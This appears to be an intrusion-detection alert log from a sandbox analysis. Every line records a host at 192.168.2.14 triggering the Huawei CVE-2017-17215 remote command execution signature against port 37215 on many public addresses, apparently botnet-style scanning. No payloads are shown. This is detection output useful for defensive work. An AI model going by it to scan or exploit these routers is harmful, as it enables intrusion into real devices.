                                                        06/13/24-21:32:30.075279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3409037215192.168.2.1441.74.174.216
                                                        06/13/24-21:32:44.475941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5806837215192.168.2.1441.185.206.213
                                                        06/13/24-21:32:11.488373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4267437215192.168.2.14156.189.94.205
                                                        06/13/24-21:32:36.245059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336237215192.168.2.14156.113.99.117
                                                        06/13/24-21:33:07.038109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4537037215192.168.2.14156.58.188.40
                                                        06/13/24-21:32:54.725233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5246437215192.168.2.14156.3.20.93
                                                        06/13/24-21:32:46.503612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5351037215192.168.2.14156.116.8.20
                                                        06/13/24-21:33:07.055510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5623837215192.168.2.1441.115.218.18
                                                        06/13/24-21:32:50.629584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3581237215192.168.2.1441.166.45.28
                                                        06/13/24-21:32:05.368717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5064237215192.168.2.14156.46.51.117
                                                        06/13/24-21:33:09.089937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4993037215192.168.2.14156.246.180.49
                                                        06/13/24-21:32:46.526290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5061237215192.168.2.14156.48.220.51
                                                        06/13/24-21:32:21.787098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4016637215192.168.2.14156.190.50.84
                                                        06/13/24-21:32:36.265516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4355037215192.168.2.1441.237.221.6
                                                        06/13/24-21:32:09.438778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3348037215192.168.2.14156.121.51.60
                                                        06/13/24-21:33:17.339555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4776837215192.168.2.14156.65.174.109
                                                        06/13/24-21:33:00.872289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4835037215192.168.2.14156.30.126.125
                                                        06/13/24-21:33:05.010152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3578237215192.168.2.14156.127.250.213
                                                        06/13/24-21:32:07.416394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4991637215192.168.2.14197.26.2.191
                                                        06/13/24-21:33:13.229592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4013437215192.168.2.14197.160.55.197
                                                        06/13/24-21:33:13.229883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5412437215192.168.2.14197.226.225.224
                                                        06/13/24-21:32:17.677478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4126437215192.168.2.1441.121.165.110
                                                        06/13/24-21:32:25.994577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5259637215192.168.2.1441.19.136.102
                                                        06/13/24-21:32:32.169015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5293437215192.168.2.1441.223.131.58
                                                        06/13/24-21:32:52.676952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5803437215192.168.2.1441.1.224.13
                                                        06/13/24-21:33:00.867553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932037215192.168.2.14156.96.205.109
                                                        06/13/24-21:32:34.217739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4163037215192.168.2.1441.132.231.66
                                                        06/13/24-21:33:09.129769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4664437215192.168.2.14156.226.193.181
                                                        06/13/24-21:32:23.835181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3821037215192.168.2.14156.252.77.195
                                                        06/13/24-21:32:17.696425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5587637215192.168.2.14156.20.236.52
                                                        06/13/24-21:32:54.724781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3970637215192.168.2.14197.214.99.236
                                                        06/13/24-21:32:48.553212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4959637215192.168.2.1441.196.173.57
                                                        06/13/24-21:32:13.543023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3334837215192.168.2.14156.27.225.208
                                                        06/13/24-21:32:15.610924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4096837215192.168.2.14197.116.53.23
                                                        06/13/24-21:32:23.942405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621437215192.168.2.14156.17.158.24
                                                        06/13/24-21:32:25.975936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3389637215192.168.2.14197.247.248.159
                                                        06/13/24-21:32:09.453420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4433837215192.168.2.1441.55.229.244
                                                        06/13/24-21:32:13.565641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5973837215192.168.2.14156.118.239.80
                                                        06/13/24-21:33:17.307755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5435637215192.168.2.1441.7.237.42
                                                        06/13/24-21:32:34.199352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5024637215192.168.2.14156.98.38.34
                                                        06/13/24-21:32:46.528016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5767437215192.168.2.14197.17.22.221
                                                        06/13/24-21:32:11.486925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3560237215192.168.2.14156.29.117.65
                                                        06/13/24-21:32:19.729166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974437215192.168.2.14197.81.133.136
                                                        06/13/24-21:32:01.222017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5328237215192.168.2.14156.209.151.245
                                                        06/13/24-21:32:25.970762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3751437215192.168.2.14156.162.183.229
                                                        06/13/24-21:32:58.824616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625837215192.168.2.14156.236.155.18
                                                        06/13/24-21:32:01.225039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5258237215192.168.2.14156.105.95.62
                                                        06/13/24-21:32:03.276749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6087437215192.168.2.14156.145.120.237
                                                        06/13/24-21:32:42.421237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4694037215192.168.2.14156.27.1.207
                                                        06/13/24-21:32:56.754588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3933837215192.168.2.14156.46.166.229
                                                        06/13/24-21:32:30.093924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4103237215192.168.2.1441.0.68.137
                                                        06/13/24-21:32:07.402269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5367837215192.168.2.14197.227.251.128
                                                        06/13/24-21:32:46.502312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5999037215192.168.2.14197.157.177.16
                                                        06/13/24-21:33:15.254806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5370437215192.168.2.1441.203.210.198
                                                        06/13/24-21:32:17.679188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4864437215192.168.2.1441.102.157.22
                                                        06/13/24-21:32:50.611838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5357237215192.168.2.14156.83.132.93
                                                        06/13/24-21:33:07.041250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291437215192.168.2.14197.251.181.165
                                                        06/13/24-21:32:58.820824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3570837215192.168.2.14156.122.169.226
                                                        06/13/24-21:32:42.422004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3395837215192.168.2.14156.133.123.168
                                                        06/13/24-21:33:07.040345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4788237215192.168.2.14156.159.127.71
                                                        06/13/24-21:33:15.252742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3287837215192.168.2.14156.155.125.117
                                                        06/13/24-21:33:15.254497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5168237215192.168.2.1441.65.122.213
                                                        06/13/24-21:32:50.617477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201037215192.168.2.14156.78.119.87
                                                        06/13/24-21:33:17.304513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3829037215192.168.2.14156.209.236.241
                                                        06/13/24-21:33:00.887209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3860637215192.168.2.1441.10.218.210
                                                        06/13/24-21:33:02.909762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4837437215192.168.2.14156.117.172.28
                                                        06/13/24-21:32:19.728920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5911237215192.168.2.14156.73.84.164
                                                        06/13/24-21:32:07.404176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3994637215192.168.2.14156.227.82.247
                                                        06/13/24-21:32:50.631743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5409837215192.168.2.14156.110.70.79
                                                        06/13/24-21:33:00.871739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4314237215192.168.2.14197.198.49.87
                                                        06/13/24-21:32:50.610282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5691237215192.168.2.14156.33.46.225
                                                        06/13/24-21:33:13.214659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5672637215192.168.2.1441.171.230.135
                                                        06/13/24-21:32:15.607071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4030437215192.168.2.14156.157.93.200
                                                        06/13/24-21:32:42.408738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3393437215192.168.2.14156.186.238.249
                                                        06/13/24-21:32:30.074373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4904837215192.168.2.1441.97.104.47
                                                        06/13/24-21:33:09.091281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503437215192.168.2.14156.72.215.114
                                                        06/13/24-21:32:30.075812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5959237215192.168.2.14156.61.0.245
                                                        06/13/24-21:32:09.458838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4641037215192.168.2.14197.45.49.209
                                                        06/13/24-21:32:05.345979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3468237215192.168.2.14156.207.127.142
                                                        06/13/24-21:33:09.128591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4744037215192.168.2.14197.80.62.52
                                                        06/13/24-21:32:54.708072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4338437215192.168.2.1441.157.164.132
                                                        06/13/24-21:32:28.044493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4692837215192.168.2.14156.220.160.20
                                                        06/13/24-21:32:34.192914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3953637215192.168.2.14156.45.91.216
                                                        06/13/24-21:32:38.318291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5870437215192.168.2.14197.244.68.243
                                                        06/13/24-21:32:32.165954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3817637215192.168.2.14156.67.175.70
                                                        06/13/24-21:32:15.611188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3563837215192.168.2.14156.168.88.102
                                                        06/13/24-21:32:30.095227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5662637215192.168.2.14197.199.83.113
                                                        06/13/24-21:32:07.415414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5829637215192.168.2.14197.44.66.170
                                                        06/13/24-21:32:34.198334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4235837215192.168.2.14156.254.210.123
                                                        06/13/24-21:32:15.635010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4644837215192.168.2.1441.187.166.205
                                                        06/13/24-21:32:23.932430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3610037215192.168.2.14197.22.191.182
                                                        06/13/24-21:32:05.346877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4136437215192.168.2.14156.175.57.55
                                                        06/13/24-21:31:57.092754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3334437215192.168.2.14156.99.213.65
                                                        06/13/24-21:32:56.790561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440837215192.168.2.1441.180.120.11
                                                        06/13/24-21:33:17.309086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4763437215192.168.2.14197.172.66.1
                                                        06/13/24-21:32:25.996979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4284437215192.168.2.14197.188.88.189
                                                        06/13/24-21:32:56.757116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3616837215192.168.2.1441.126.144.156
                                                        06/13/24-21:33:13.228040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4497637215192.168.2.1441.173.50.22
                                                        06/13/24-21:32:32.165717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5437037215192.168.2.14156.17.243.168
                                                        06/13/24-21:31:59.176426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4770037215192.168.2.14197.82.233.43
                                                        06/13/24-21:33:02.953747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3470837215192.168.2.1441.114.55.140
                                                        06/13/24-21:32:52.655898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4259637215192.168.2.1441.222.28.246
                                                        06/13/24-21:32:54.725865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5412437215192.168.2.14197.79.105.188
                                                        06/13/24-21:33:09.087457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3443237215192.168.2.1441.174.37.178
                                                        06/13/24-21:32:30.095545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4571437215192.168.2.14156.249.232.40
                                                        06/13/24-21:32:13.546396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5918837215192.168.2.14197.163.243.137
                                                        06/13/24-21:32:40.373188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4448437215192.168.2.14156.206.57.70
                                                        06/13/24-21:31:57.134360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440037215192.168.2.1441.202.41.223
                                                        06/13/24-21:33:09.128093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3947637215192.168.2.1441.89.22.29
                                                        06/13/24-21:32:50.609821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3756037215192.168.2.14156.68.246.235
                                                        06/13/24-21:33:17.304047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5479437215192.168.2.14197.212.172.75
                                                        06/13/24-21:32:50.612551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4150037215192.168.2.1441.78.63.1
                                                        06/13/24-21:32:56.783734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3970237215192.168.2.1441.62.88.234
                                                        06/13/24-21:32:19.729323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4219837215192.168.2.14197.213.243.59
                                                        06/13/24-21:33:17.304565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434037215192.168.2.1441.10.136.221
                                                        06/13/24-21:32:11.510087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4418037215192.168.2.14156.164.232.52
                                                        06/13/24-21:32:25.995989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3664237215192.168.2.1441.2.5.76
                                                        06/13/24-21:32:09.439760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4409837215192.168.2.14197.197.22.21
                                                        06/13/24-21:32:52.678074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5244637215192.168.2.14197.164.144.42
                                                        06/13/24-21:33:07.059662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5331037215192.168.2.14156.23.119.208
                                                        06/13/24-21:32:23.834688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4878637215192.168.2.1441.124.21.189
                                                        06/13/24-21:32:23.836582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4875837215192.168.2.14156.24.174.37
                                                        06/13/24-21:32:13.565231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4094437215192.168.2.14197.51.85.55
                                                        06/13/24-21:33:13.227929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432637215192.168.2.14197.35.230.96
                                                        06/13/24-21:32:03.301254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4016437215192.168.2.14156.128.127.167
                                                        06/13/24-21:32:11.488432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3763437215192.168.2.14156.187.31.37
                                                        06/13/24-21:33:04.991098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3981437215192.168.2.14197.119.21.118
                                                        06/13/24-21:32:21.786529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332437215192.168.2.14197.70.230.201
                                                        06/13/24-21:33:07.042067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5231037215192.168.2.14156.233.67.123
                                                        06/13/24-21:32:32.167983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5637237215192.168.2.1441.158.112.214
                                                        06/13/24-21:32:34.195343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5707837215192.168.2.14197.48.124.152
                                                        06/13/24-21:32:15.630295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5639237215192.168.2.1441.196.109.15
                                                        06/13/24-21:32:52.670292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5279637215192.168.2.14197.127.246.176
                                                        06/13/24-21:32:44.457148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3347037215192.168.2.1441.128.83.155
                                                        06/13/24-21:31:57.137730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3748637215192.168.2.14197.117.53.251
                                                        06/13/24-21:32:21.805577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4525237215192.168.2.14156.177.236.2
                                                        06/13/24-21:33:17.310092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5608837215192.168.2.1441.153.187.30
                                                        06/13/24-21:32:44.474678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5025037215192.168.2.14156.231.128.87
                                                        06/13/24-21:32:56.786802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4382637215192.168.2.14197.166.126.3
                                                        06/13/24-21:33:07.039876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4319437215192.168.2.14197.89.130.246
                                                        06/13/24-21:33:09.106783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4971237215192.168.2.14197.214.111.222
                                                        06/13/24-21:32:05.377414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915237215192.168.2.14197.33.8.72
                                                        06/13/24-21:32:01.220938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482237215192.168.2.1441.159.91.0
                                                        06/13/24-21:32:01.221123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3672637215192.168.2.14197.194.117.63
                                                        06/13/24-21:32:07.403749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5850837215192.168.2.14197.54.161.244
                                                        06/13/24-21:32:30.079388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5148037215192.168.2.14197.31.63.72
                                                        06/13/24-21:33:13.229428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4866237215192.168.2.14156.134.88.120
                                                        06/13/24-21:32:42.417949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3429437215192.168.2.1441.159.21.138
                                                        06/13/24-21:32:01.221890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4814237215192.168.2.14156.230.84.227
                                                        06/13/24-21:33:09.111988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5642237215192.168.2.1441.83.30.120
                                                        06/13/24-21:32:56.755768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3685837215192.168.2.14156.11.254.223
                                                        06/13/24-21:32:09.439888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4179037215192.168.2.14197.58.218.218
                                                        06/13/24-21:32:05.344685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4928037215192.168.2.14156.106.109.175
                                                        06/13/24-21:32:54.707879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5055837215192.168.2.14197.232.179.160
                                                        06/13/24-21:33:09.129476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4282237215192.168.2.14197.230.169.58
                                                        06/13/24-21:32:40.377559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618237215192.168.2.14156.172.106.118
                                                        06/13/24-21:32:25.973096TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4040637215192.168.2.1441.53.18.24
                                                        06/13/24-21:31:59.174039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3369837215192.168.2.14197.111.190.191
                                                        06/13/24-21:32:01.247922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5575837215192.168.2.1441.192.118.90
                                                        06/13/24-21:32:03.294385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4172237215192.168.2.1441.200.26.96
                                                        06/13/24-21:32:28.023936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3995037215192.168.2.14197.220.164.116
                                                        06/13/24-21:32:15.634618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5067837215192.168.2.14156.164.42.37
                                                        06/13/24-21:33:02.911203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084037215192.168.2.14197.178.124.107
                                                        06/13/24-21:33:15.257375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4617837215192.168.2.1441.117.168.27
                                                        06/13/24-21:32:09.440666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3934437215192.168.2.14197.187.75.94
                                                        06/13/24-21:32:58.843891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4192037215192.168.2.14197.210.174.208
                                                        06/13/24-21:32:30.119458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4410037215192.168.2.1441.34.78.85
                                                        06/13/24-21:33:15.274313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5193037215192.168.2.1441.210.194.82
                                                        06/13/24-21:32:38.323092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025237215192.168.2.14156.84.174.39
                                                        06/13/24-21:33:11.155910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5613037215192.168.2.14156.154.25.253
                                                        06/13/24-21:32:36.246483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3888237215192.168.2.14197.188.134.8
                                                        06/13/24-21:33:11.181582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3776037215192.168.2.14197.115.133.192
                                                        06/13/24-21:33:15.276970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5993637215192.168.2.14156.96.196.96
                                                        06/13/24-21:33:00.866369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3729037215192.168.2.14197.251.218.157
                                                        06/13/24-21:32:23.836359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4891437215192.168.2.14197.97.8.18
                                                        06/13/24-21:33:02.912084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4732637215192.168.2.1441.113.108.253
                                                        06/13/24-21:32:32.153847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336037215192.168.2.1441.47.243.209
                                                        06/13/24-21:32:38.323290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4346037215192.168.2.14197.254.25.84
                                                        06/13/24-21:32:30.075168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4005037215192.168.2.1441.122.170.60
                                                        06/13/24-21:32:40.358846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4327037215192.168.2.1441.203.220.51
                                                        06/13/24-21:32:44.478129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3694237215192.168.2.14197.232.241.166
                                                        06/13/24-21:32:48.550670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3846837215192.168.2.14197.27.93.44
                                                        06/13/24-21:32:09.456008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4398837215192.168.2.14156.230.205.206
                                                        06/13/24-21:33:00.887434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3812837215192.168.2.1441.75.203.181
                                                        06/13/24-21:32:25.993482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674637215192.168.2.14197.158.15.53
